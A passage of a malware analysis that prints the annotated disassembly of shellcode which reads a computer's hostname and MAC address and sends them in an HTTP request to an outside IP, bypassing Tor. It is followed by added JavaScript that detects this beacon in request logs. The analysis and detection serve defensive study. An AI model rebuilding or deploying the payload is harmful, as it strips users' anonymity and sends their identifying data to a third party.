0000012E 52 push edx
0000012F 50 push eax
00000130 52 push edx
00000131 68B649DE01 push dword 0x1de49b6 # gethostname
00000136 FFD5 call ebp
00000138 5F pop edi
00000139 81C400010000 add esp,0x100
0000013F 85C0 test eax,eax
00000141 0F85F2000000 jnz near 0x239
00000147 57 push edi
00000148 E8F9000000 call 0x246 # strlen of gethostname
0000014D 5E pop esi
0000014E 89CA mov edx,ecx
00000150 8DBDE9020000 lea edi,[ebp+0x2e9]
00000156 E8EB000000 call 0x246 # strlen (to move EDI to the NULL byte at the end of the HTTP string)
0000015B 4F dec edi
0000015C 83FA20 cmp edx,byte +0x20
0000015F 7C05 jl 0x166
00000161 BA20000000 mov edx,0x20
00000166 89D1 mov ecx,edx
00000168 56 push esi
00000169 F3A4 rep movsb
0000016B B90D000000 mov ecx,0xd
00000170 8DB5C4020000 lea esi,[ebp+0x2c4] “\r\nCookie: ID=”
00000176 F3A4 rep movsb
00000178 89BD4B020000 mov [ebp+0x24b],edi
0000017E 5E pop esi
0000017F 56 push esi
00000180 68A9283480 push dword 0x803428a9 # gethostbyname
00000185 FFD5 call ebp
00000187 85C0 test eax,eax
00000189 0F84AA000000 jz near 0x239
0000018F 668B480A mov cx,[eax+0xa]
00000193 6683F904 cmp cx,byte +0x4
00000197 0F829C000000 jc near 0x239
0000019D 8D400C lea eax,[eax+0xc]
000001A0 8B00 mov eax,[eax]
000001A2 8B08 mov ecx,[eax]
000001A4 8B09 mov ecx,[ecx]
000001A6 B800010000 mov eax,0x100
000001AB 50 push eax
000001AC 89E7 mov edi,esp
000001AE 29C4 sub esp,eax
000001B0 89E6 mov esi,esp
000001B2 57 push edi
000001B3 56 push esi
000001B4 51 push ecx
000001B5 51 push ecx
000001B6 684872D2B8 push dword 0xb8d27248 # iphlpapi.dll!SendARP
000001BB FFD5 call ebp
000001BD 85C0 test eax,eax
000001BF 81C404010000 add esp,0x104
000001C5 0FB70F movzx ecx,word [edi]
000001C8 83F906 cmp ecx,byte +0x6
000001CB 726C jc 0x239
000001CD B906000000 mov ecx,0x6
000001D2 B810000000 mov eax,0x10
000001D7 29C4 sub esp,eax
000001D9 89E7 mov edi,esp
000001DB 89CA mov edx,ecx
000001DD D1E2 shl edx,1
000001DF 50 push eax
000001E0 52 push edx
000001E1 31D2 xor edx,edx
000001E3 8A16 mov dl,[esi]
000001E5 88D0 mov al,dl
000001E7 24F0 and al,0xf0 # It actually turns the raw data into hex strings before appending it to the HTTP header
000001E9 C0E804 shr al,0x4
000001EC 3C09 cmp al,0x9
000001EE 7704 ja 0x1f4
000001F0 0430 add al,0x30
000001F2 EB02 jmp short 0x1f6
000001F4 0437 add al,0x37
000001F6 8807 mov [edi],al
000001F8 47 inc edi
000001F9 88D0 mov al,dl
000001FB 240F and al,0xf
000001FD 3C09 cmp al,0x9
000001FF 7704 ja 0x205
00000201 0430 add al,0x30
00000203 EB02 jmp short 0x207
00000205 0437 add al,0x37
00000207 8807 mov [edi],al
00000209 47 inc edi
0000020A 46 inc esi
0000020B E2D4 loop 0x1e1
0000020D 59 pop ecx
0000020E 29CF sub edi,ecx
00000210 89FE mov esi,edi
00000212 58 pop eax
00000213 01C4 add esp,eax
00000215 8BBD4B020000 mov edi,[ebp+0x24b]
0000021B F3A4 rep movsb
0000021D C6854F02000001 mov byte [ebp+0x24f],0x1
00000224 E82E000000 call 0x257 # Append “Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n” and return the new strlen(ebp + 0x2e9)
00000229 31C0 xor eax,eax
0000022B 50 push eax
0000022C 51 push ecx
0000022D 29CF sub edi,ecx
0000022F 4F dec edi
00000230 57 push edi
00000231 53 push ebx
00000232 68C2EB385F push dword 0x5f38ebc2 # send
00000237 FFD5 call ebp
00000239 53 push ebx
0000023A 68756E4D61 push dword 0x614d6e75 # closesocket
0000023F FFD5 call ebp
00000241 E9C8FEFFFF jmp 0x10e
00000246 31C9 xor ecx,ecx
00000248 F7D1 not ecx
0000024A 31C0 xor eax,eax
0000024C F2AE repne scasb
0000024E F7D1 not ecx
00000250 49 dec ecx
00000251 C3 ret
00000252 0000 add [eax],al
00000254 0000 add [eax],al
00000256 008DBDE90200 add [ebp+0x2e9bd],cl
0000025C 00E8 add al,ch
0000025E E4FF in al,0xff
00000260 FF db 0xFF
00000261 FF4FB9 dec dword [edi-0x47]
00000264 4F dec edi
00000265 0000 add [eax],al
00000267 008DB5750200 add [ebp+0x275b5],cl
0000026D 00F3 add bl,dh
0000026F A4 movsb
00000270 8DBDE9020000 lea edi,[ebp+0x2e9]
00000276 E8CBFFFFFF call 0x246
0000027B C3 ret
0000027C 0D0A436F6E or eax,0x6e6f430a
00000281 6E outsb
00000282 656374696F arpl [gs:ecx+ebp*2+0x6f],si
00000287 6E outsb
00000288 3A20 cmp ah,[eax]
0000028A 6B656570 imul esp,[ebp+0x65],byte +0x70
0000028E 2D616C6976 sub eax,0x76696c61
00000293 650D0A416363 gs or eax,0x6363410a
00000299 657074 gs jo 0x310
0000029C 3A20 cmp ah,[eax]
0000029E 2A2F sub ch,[edi]
000002A0 2A0D0A416363 sub cl,[0x6363410a]
000002A6 657074 gs jo 0x31d
000002A9 2D456E636F sub eax,0x6f636e45
000002AE 64696E673A20677A imul ebp,[fs:esi+0x67],dword 0x7a67203a
000002B6 69700D0A0D0A00 imul esi,[eax+0xd],dword 0xa0d0a
000002BD 83C70E add edi,byte +0xe
000002C0 31C9 xor ecx,ecx
000002C2 F7D1 not ecx
000002C4 31C0 xor eax,eax
000002C6 F3AE repe scasb
000002C8 4F dec edi
000002C9 FFE7 jmp edi
000002CB 0D0A436F6F or eax,0x6f6f430a
000002D0 6B69653A imul ebp,[ecx+0x65],byte +0x3a
000002D4 204944 and [ecx+0x44],cl
000002D7 3D7773325F cmp eax,0x5f327377
000002DC 3332 xor esi,[edx]
000002DE 004950 add [ecx+0x50],cl
000002E1 48 dec eax
000002E2 4C dec esp
000002E3 50 push eax
000002E4 41 inc ecx
000002E5 50 push eax
000002E6 49 dec ecx
000002E7 0002 add [edx],al
000002E9 0000 add [eax],al
000002EB 50 push eax
000002EC 41 inc ecx
000002ED DECA fmulp st2
000002EF 3647 ss inc edi
000002F1 45 inc ebp
000002F2 54 push esp
000002F3 202F and [edi],ch
000002F5 303563656134 xor [0x34616563],dh
000002FB 64652D39353164 gs sub eax,0x64313539
00000302 2D34303337 sub eax,0x37333034
00000307 2D62663866 sub eax,0x66386662
0000030C 2D66363930 sub eax,0x30393666
00000311 3535623237 xor eax,0x37326235
00000316 396262 cmp [edx+0x62],esp
00000319 204854 and [eax+0x54],cl
0000031C 54 push esp
0000031D 50 push eax
0000031E 2F das
0000031F 312E xor [esi],ebp
00000321 310D0A486F73 xor [0x736f480a],ecx
00000327 743A jz 0x363
00000329 2000 and [eax],al
0000032B 0000 add [eax],al
0000032D 0000 add [eax],al
0000032F 0000 add [eax],al
00000331 0000 add [eax],al
00000333 0000 add [eax],al
00000335 0000 add [eax],al
00000337 0000 add [eax],al
00000339 0000 add [eax],al
0000033B 0000 add [eax],al
0000033D 0000 add [eax],al
0000033F 0000 add [eax],al
00000341 0000 add [eax],al
00000343 0000 add [eax],al
00000345 0000 add [eax],al
00000347 0000 add [eax],al
00000349 0000 add [eax],al
0000034B 0000 add [eax],al
0000034D 0000 add [eax],al
0000034F 0000 add [eax],al
00000351 0000 add [eax],al
00000353 0000 add [eax],al
00000355 0000 add [eax],al
00000357 0000 add [eax],al
00000359 0000 add [eax],al
0000035B 0000 add [eax],al
0000035D 0000 add [eax],al
0000035F 0000 add [eax],al
00000361 0000 add [eax],al
00000363 0000 add [eax],al
00000365 0000 add [eax],al
00000367 0000 add [eax],al
00000369 0000 add [eax],al
0000036B 0000 add [eax],al
0000036D 0000 add [eax],al
0000036F 0000 add [eax],al
00000371 0000 add [eax],al
00000373 0000 add [eax],al
00000375 0000 add [eax],al
00000377 0000 add [eax],al
00000379 0000 add [eax],al
0000037B 0000 add [eax],al
0000037D 0000 add [eax],al
0000037F 0000 add [eax],al
00000381 0000 add [eax],al
00000383 0000 add [eax],al
00000385 0000 add [eax],al
00000387 0000 add [eax],al
00000389 0000 add [eax],al
0000038B 0000 add [eax],al
0000038D 0000 add [eax],al
0000038F 0000 add [eax],al
00000391 0000 add [eax],al
00000393 0000 add [eax],al
00000395 0000 add [eax],al
00000397 0000 add [eax],al
00000399 0000 add [eax],al
0000039B 0000 add [eax],al
0000039D 0000 add [eax],al
0000039F 0000 add [eax],al
000003A1 0000 add [eax],al
000003A3 0000 add [eax],al
000003A5 0000 add [eax],al
000003A7 0000 add [eax],al
000003A9 0000 add [eax],al
000003AB 0000 add [eax],al
000003AD 0000 add [eax],al
000003AF 0000 add [eax],al
000003B1 0000 add [eax],al
000003B3 0000 add [eax],al
000003B5 0000 add [eax],al
000003B7 0000 add [eax],al
000003B9 0000 add [eax],al
000003BB 90 nop
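Added example (my code, not from the page): detection logic for the beacon the payload sends. Reading the disassembly, ebp holds shellcode offset 7 (the return address pushed by the initial call), so the data at [ebp+0x2e9] is the string starting at offset 0x2f0: "GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\r\nHost: ". The code at 0x14e-0x178 appends the hostname (capped at 0x20 bytes) and "\r\nCookie: ID=" (the 13 bytes at 0x2cb), 0x1d2-0x21b appends the MAC as 12 uppercase hex digits, and the call at 0x224 appends the Connection/Accept trailer at 0x27c. The parser and the indicator names are mine, the sample requests are constructed (made-up hostname and MAC, documentation IPs for the "normal" traffic), and the destination IP is assumed to come from the proxy log or packet capture. The second indicator pair generalises beyond the one URL: a bare machine name in Host plus a raw MAC in a cookie is what gives this beacon away on any path.

```javascript
// Added example: spot the payload's beacon in raw HTTP requests. Not part of
// the page; indicator names and samples are mine. The beacon format is taken
// from the disassembly above; the request never goes through Tor because the
// shellcode connects to 65.222.202.54:80 with its own socket.

const BEACON_PATH = "/05cea4de-951d-4037-bf8f-f69055b279bb"; // from offset 0x2f0

// Parse the request line and headers of one raw HTTP/1.x request.
function parseHttpRequest(raw) {
  const head = raw.split("\r\n\r\n")[0];
  const lines = head.split("\r\n");
  const [method, target, version] = lines[0].split(" ");
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, target, version, headers };
}

// Split a Cookie header into name/value pairs.
function parseCookies(cookieHeader) {
  const out = {};
  for (const part of (cookieHeader || "").split(";")) {
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    out[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return out;
}

// Indicators present in a request, in a fixed order ([] when none fire).
function beaconIndicators(raw, dstIp) {
  const req = parseHttpRequest(raw);
  const host = req.headers["host"] || "";
  const cookies = parseCookies(req.headers["cookie"]);
  const reasons = [];
  if (req.target === BEACON_PATH) reasons.push("known-beacon-path");
  // The payload writes the MAC as 12 uppercase hex digits (0x30 / 0x37 offsets).
  if (/^[0-9A-F]{12}$/.test(cookies["ID"] || "")) reasons.push("mac-in-cookie");
  // gethostname() output: a bare machine name, not a domain and not the peer IP.
  if (host !== "" && !host.includes(".") && host !== dstIp) reasons.push("host-is-bare-machine-name");
  return reasons;
}

// Alert when two independent indicators agree, so a single bare Host is not enough.
function isLikelyBeacon(raw, dstIp) {
  return beaconIndicators(raw, dstIp).length >= 2;
}

// Constructed sample traffic (hostname and MAC are made up).
const SAMPLE_BEACON =
  "GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\r\n" +
  "Host: WORKSTATION-07\r\n" +
  "Cookie: ID=001A2B3C4D5E\r\n" +
  "Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n";

const SAMPLE_VARIANT =   // same shape, different path
  "GET / HTTP/1.1\r\nHost: LAPTOP-1\r\nCookie: ID=AABBCCDDEEFF\r\n\r\n";

const SAMPLE_NORMAL =
  "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n" +
  "Cookie: session=abc123; theme=dark\r\nAccept: */*\r\n\r\n";

console.log(beaconIndicators(SAMPLE_BEACON, "65.222.202.54"));  // all three indicators
console.log(isLikelyBeacon(SAMPLE_VARIANT, "192.0.2.7"));      // true
console.log(isLikelyBeacon(SAMPLE_NORMAL, "192.0.2.1"));       // false
```

Feeding a proxy's request log through beaconIndicators is cheap; the more durable control is that a browser routed through Tor should never be able to open a direct TCP connection at all, which is what an egress firewall on the Tor client host enforces.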
Sources: Extreme Tech, Naked Security, Ars Technica, Information Week, SANS, Darker Net